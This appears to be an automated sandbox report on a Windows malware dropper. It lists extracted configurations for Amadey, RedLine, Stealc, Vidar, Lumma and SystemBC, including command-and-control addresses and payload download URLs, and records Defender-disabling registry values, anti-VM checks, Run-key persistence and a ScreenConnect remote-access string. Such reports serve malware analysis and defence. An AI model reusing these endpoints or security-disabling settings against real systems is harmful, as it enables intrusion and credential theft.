Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
20-02-2025 14:04
Static task
static1
Behavioral task
behavioral1
Sample
3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe
Resource
win10v2004-20250217-en
General
-
Target
3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe
-
Size
2.1MB
-
MD5
c69b7bac11b14128b1b1730e0f9732e9
-
SHA1
02fb9cd3f069cf7ca9f716ef1ce42ff58ba5b230
-
SHA256
3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1
-
SHA512
aa945a199241a72e28f0efd9b2e471505b111aed4fb27dfe146ffec4e309d8495841ceae94e50b139f5a3c559d888d4a7229cb6c6eff780ca9ec7fdd200b7342
-
SSDEEP
24576:gSWtfoYP2LExV94F87p/Z79SBHSA4luPmuNDjwFMh0XpR5c+JEwV2fEh+iTq7Xm4:gSWtuW7byHZ4luPjDjjh0dBSNLwqMyH
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
systembc
cobolrationumelawrtewarms.co:4001
93.186.202.3:4001
-
dns
5.132.191.104
ns1.vic.au.dns.opennic.glue
ns2.vic.au.dns.opennic.glue
Extracted
redline
cheat
103.84.89.222:33791
Extracted
stealc
default
http://ecozessentials.com
-
url_path
/e6cb1c8fc7cd1659.php
Extracted
vidar
https://t.me/g02f04
https://steamcommunity.com/profiles/76561199828130190
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
lumma
https://penetratebatt.pw/api
Signatures
-
Amadey family
-
Detect Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/5864-600-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/5864-602-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/3340-327-0x00000000000A0000-0x0000000000512000-memory.dmp healer behavioral2/memory/3340-326-0x00000000000A0000-0x0000000000512000-memory.dmp healer behavioral2/memory/3340-482-0x00000000000A0000-0x0000000000512000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral2/memory/4504-419-0x0000000000C00000-0x0000000001078000-memory.dmp family_sectoprat behavioral2/memory/4504-420-0x0000000000C00000-0x0000000001078000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Systembc family
-
Vidar family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF a8e58ac38e.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 23 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ff653c0cca.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempIYO2CYHYQTUHDT2DSMYNBLVLLZQ2SRVJ.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ kdMujZh.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ MAl7pjE.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b95bc460f0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bxvt.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d88b7e7413.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8380fa5fb3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e14cb127ab.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 74caf6e3ae.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 64195aed60.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a8e58ac38e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cda781c13c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cda781c13c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 80ceef0059.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bxvt.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ MAl7pjE.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 42 1060 powershell.exe 55 3028 powershell.exe 354 872 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 1060 powershell.exe 3028 powershell.exe 872 powershell.exe 3948 powershell.exe 4508 powershell.exe 4388 powershell.exe -
Downloads MZ/PE file 34 IoCs
flow pid Process 64 5800 BitLockerToGo.exe 55 3028 powershell.exe 110 5764 futors.exe 354 872 powershell.exe 28 1456 skotes.exe 89 5764 futors.exe 89 5764 futors.exe 89 5764 futors.exe 89 5764 futors.exe 238 4000 BitLockerToGo.exe 242 1456 skotes.exe 242 1456 skotes.exe 242 1456 skotes.exe 42 1060 powershell.exe 169 5764 futors.exe 13 1456 skotes.exe 13 1456 skotes.exe 13 1456 skotes.exe 13 1456 skotes.exe 13 1456 skotes.exe 13 1456 skotes.exe 13 1456 skotes.exe 13 1456 skotes.exe 13 1456 skotes.exe 13 1456 skotes.exe 13 1456 skotes.exe 13 1456 skotes.exe 13 1456 skotes.exe 13 1456 skotes.exe 13 1456 skotes.exe 13 1456 skotes.exe 13 1456 skotes.exe 13 1456 skotes.exe 13 1456 skotes.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (91b7d375130f294a)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=fv-dev.innocreed.com&p=8041&s=5538fd77-72b6-457c-b3e9-8a5db180eeec&k=BgIAAACkAABSU0ExAAgAAAEAAQD5wtPOV3jCKFBLBsJ%2bV2IvGNdB3BTw3%2f7f3qmPmpEeYSXd1jGOatzoch6LU%2fh7cgGu%2bCj4f65wOx8AqDxICfj1AlxsHvMXD0ReOH62PLLSTPTukKm5RrhhJDxk4MmWP%2byBb46HAlkpjuwiGPts8qrBKMb47tVBoGNwLhbutjkbQNksjhMQH1AWAWUktJQ85d0L163Ahixe3xI7cGngG1%2baQm5IzZ3UPJpZ%2b9SN8gb89xLov6PdHVlnj%2bxe1Qvlapboi4ODTYPekRoAhHcR2A9cyIErFTA4j5R4TWoF8f3ZRb6IRobccYev2f%2b8vM98GtEnWHEzuZHxGcRJ5afFuG3P&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAHb%2bs1pY9TUyROCm01HafegAAAAACAAAAAAAQZgAAAAEAACAAAACaFyok%2bWarPM02Cgadggw1skbbAkhU8A7WawR53WqtzQAAAAAOgAAAAAIAACAAAACypVbK2cOJ3DBFZhkU1Uqk4roNMXwS8dqwi4sx0Sqyq6AEAADyzobazR0QIo3hzNEZO24c6ezqalT%2bOws35wzXl4Elgqu7kfHydi%2f0KErtRluI8JNk6oP8X5RZ%2bNyq4C0ZRBLICS6Er%2b6l3Z6y%2fiUzdo26ylwPNyUXJDqA5jG4vaQPmJhHeTouQyZeLcVyCpGh5EabBTALzHiqViPFCsTiLXEZZxrlRlUcFQwd%2buADxdQglyRSTTNovce%2fP%2f5xm%2b8gXsDCHdqiWFpXPcg%2fhOUFhuTHztLz%2bhOqjecWHmZ0l%2bv6ihwxZsQP4wvUIIbuIjlV7qemO0f5UgbJI8xXawWw%2bUU%2fUFcfKCYdxfKS1zDpWGwM51IYy4u3ccOR6ZcTjYsklXgsKJ3hxtqSEXYRyrP6NdM5J%2fvKuvd5dP58nSdtqcvkrbo5HzwGRsFWiVrl5APiWQZMvfdiySQCz9KYoOFYoxauOrayIevu0E%2b0rqJiE8o4dAu%2bfyRmCpYx%2f7Jh6AtawvPQwDj7VskdYCjzJ52lAaOET38LUujl4b%2flFJk2YCE6djAlztGqdEltTMZdGevtKWkhqb0V26yYLVb55ynwChHNfu9yt%2f2CXVSJefZUPd5ovvv7PYyW67YASvHpgBfXj%2bh61sc3pKTEhmb%2bEuE6hSRtunjOEIu6Qk4fOqSH%2b%2b3PqKMzKPdCOuQA1P3KMAbVbpDTS7wxylGB4o%2buVXJFeuNp8jRFEIjkz5xt6sSFGzdUQuSN64hOxYMvihKuVzDcT%2f1QDvy7K5cB6ueo%2fkEig3llZBBeDZ5eiKDEdD%2bSyV6iNsRbYIGuOfHRXuxZ5n76PcIRwljxSFOF%2bVXixbviUfovBTRJmuU7VY5ZechWY1WBmUqFAuwYw4WWJ01rH37zt2yCNx4zIIbkVyAR1ePDwVzRAVjV%2b%2fAPB2T5MyRCljTLiRb%2fCe0hTC0i%2bvpz0Bf2Ph3ceU%2f8VjWMbAQvdyisZ0fj30nZbGzgAkZHJRkX6mBttKoA8NfF1%2f%2fcbgYA%2b%2bHX3wKnyS5qdJwyqLqE8OT3%2fqXDKDwBt1tASK9QrCQwGgixvFK0I%2fo7O0DjHnHxV8dSDSpmqYaxPjua1Rj%2fgYwz9uS0b%2fG5TcLLatBue%2bZP19WqxmsFtCB0epN1uURGPGghQhkiWSopRNLDhspgxM06GDisa2vOEH0ssv%2bdAOq1QnZ1G4Qj3WDjxM5gEUdudqZD6SDog09tBW4PDnIIJ2Jhvbq2CU2hGx6Tap7%2bj5fEg%2bT6IbxaVlNsnrBE0f52DFG5WSSDucm%2bcw3j6l0FvfIgbbARt4DvyENvKl3XqZqW%2fDErGUyTrfy4DLdRdpIBsO2haKHhEXN4q1ZScANSiCYAIhKjCvjIUp6AVhJgscmEmaE40Tdn0g0qzMtKIBP9JY4J3PW7g4WvA4eJ7Td36qLIiKMrJvJ87TrTougCprYjh0ddGaZGro5wTCSn1LyedgqtxmmFjxXEZBYrV0joEgoAXU9fF0R6lG%2feqdxwxKkhSYUVcWs%2brls3mfdXDIIUmf5SQjYyJKkcRpvHQKexnNEHbguRO1j7ON7U%2b6Xaqwv6GnLJ6pVFbCchSSD9dh6rhYXH%2fQWIHCZ744deT7SQTGZ9yXGBpkAAAACyc6AnGEeQLwfSFMLhdfgpeTf2PRsZDJVvtEa2Vxjedjzix%2f%2bnBnsdEnYTzuWvyJU%2f2KGeuUhmbdTKCpiRvJBb&c=prequest&c=&c=&c=&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2372 chrome.exe 1620 chrome.exe 3504 chrome.exe 4480 chrome.exe -
Checks BIOS information in registry 2 TTPs 46 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kdMujZh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d88b7e7413.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b95bc460f0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e14cb127ab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bxvt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a8e58ac38e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cda781c13c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 80ceef0059.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 80ceef0059.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempIYO2CYHYQTUHDT2DSMYNBLVLLZQ2SRVJ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bxvt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d88b7e7413.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8380fa5fb3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ff653c0cca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bxvt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b95bc460f0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 64195aed60.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a8e58ac38e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cda781c13c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cda781c13c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kdMujZh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e14cb127ab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ff653c0cca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8380fa5fb3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 64195aed60.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cda781c13c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 74caf6e3ae.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 74caf6e3ae.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bxvt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempIYO2CYHYQTUHDT2DSMYNBLVLLZQ2SRVJ.EXE -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation a1EoH8b.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation sQ3DZPU.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation mshta.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 64 IoCs
pid Process 1456 skotes.exe 2908 f3Ypd8O.exe 3528 f3Ypd8O.exe 4072 kdMujZh.exe 3704 sQ3DZPU.exe 1460 bxvt.exe 4772 a1EoH8b.exe 3908 MAl7pjE.exe 2396 147129d910.exe 3340 TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE 4872 d88b7e7413.exe 3284 ScreenConnect.ClientService.exe 1712 ScreenConnect.WindowsClient.exe 1064 ScreenConnect.WindowsClient.exe 684 apisysDirectx.exe 4504 8380fa5fb3.exe 5208 b95bc460f0.exe 5376 483d2fa8a0d53818306efeb32d3.exe 5668 amnew.exe 5764 futors.exe 6000 skotes.exe 5992 apisysDirectx.exe 5148 futors.exe 3460 e14cb127ab.exe 4572 DTQCxXZ.exe 5728 7aencsM.exe 5864 7aencsM.exe 2376 trano1221.exe 4640 trano1221.exe 5884 con12312211221.exe 2968 con12312211221.exe 2040 con12312211221.exe 3792 con12312211221.exe 6104 monthdragon.exe 5200 monthdragon.exe 4792 dzvh4HC.exe 5336 12321321.exe 5428 Bjkm5hE.exe 5492 Bjkm5hE.exe 5296 f3Ypd8O.exe 5752 f3Ypd8O.exe 1580 alex12112.exe 5672 MAl7pjE.exe 2220 alex12112.exe 4452 alex12112.exe 3948 fher.exe 4424 fher.exe 4780 fher.exe 5288 64195aed60.exe 4392 NL58452.exe 2984 NL58452.exe 4636 a8e58ac38e.exe 2568 sQ3DZPU.exe 5476 cda781c13c.exe 5236 cda781c13c.exe 5456 74caf6e3ae.exe 2232 bxvt.exe 708 skotes.exe 3108 futors.exe 1580 apisysDirectx.exe 1460 a18028f754.exe 2452 2d9223dc79.exe 2220 ff653c0cca.exe 3476 80ceef0059.exe -
Identifies Wine through registry keys 2 TTPs 23 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine MAl7pjE.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine kdMujZh.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine bxvt.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine b95bc460f0.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine d88b7e7413.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 8380fa5fb3.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine a8e58ac38e.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine cda781c13c.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 74caf6e3ae.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine bxvt.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine TempIYO2CYHYQTUHDT2DSMYNBLVLLZQ2SRVJ.EXE Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine MAl7pjE.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine ff653c0cca.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine e14cb127ab.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 64195aed60.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine cda781c13c.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 80ceef0059.exe -
Loads dropped DLL 53 IoCs
pid Process 2496 MsiExec.exe 5108 rundll32.exe 5108 rundll32.exe 5108 rundll32.exe 5108 rundll32.exe 5108 rundll32.exe 5108 rundll32.exe 5108 rundll32.exe 5108 rundll32.exe 5108 rundll32.exe 4448 MsiExec.exe 4748 MsiExec.exe 3284 ScreenConnect.ClientService.exe 3284 ScreenConnect.ClientService.exe 3284 ScreenConnect.ClientService.exe 3284 ScreenConnect.ClientService.exe 3284 ScreenConnect.ClientService.exe 3284 ScreenConnect.ClientService.exe 3284 ScreenConnect.ClientService.exe 3284 ScreenConnect.ClientService.exe 3284 ScreenConnect.ClientService.exe 3284 ScreenConnect.ClientService.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe 4640 trano1221.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE -
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5846e91d4e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089296001\\5846e91d4e.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\147129d910.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089179101\\147129d910.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089180021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a8e58ac38e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10009640101\\a8e58ac38e.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cda781c13c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10009650101\\cda781c13c.exe" futors.exe Set value (str) 